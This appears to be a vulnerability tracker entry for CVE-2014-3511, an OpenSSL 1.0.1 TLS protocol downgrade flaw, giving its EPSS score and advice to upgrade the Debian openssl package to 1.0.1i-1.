CVE-2014-3511
EPSS 5.4%
Description
The ssl23_get_client_hello function in s23_srvr.c in OpenSSL 1.0.1 before 1.0.1i allows man-in-the-middle attackers to force the use of TLS 1.0 by triggering ClientHello message fragmentation in communication between a client and server that both support later TLS versions, related to a "protocol downgrade" issue.
How to fix CVE-2014-3511
To remediate CVE-2014-3511, upgrade the affected package to a fixed version below.
- Debian/openssl—upgrade to 1.0.1i-1 or later
Is CVE-2014-3511 being exploited?
Moderate — EPSS is 5.4%. Track this CVE but it's not at the top of the prioritisation list.
Affected packages (1)
- from 0, < 1.0.1i-1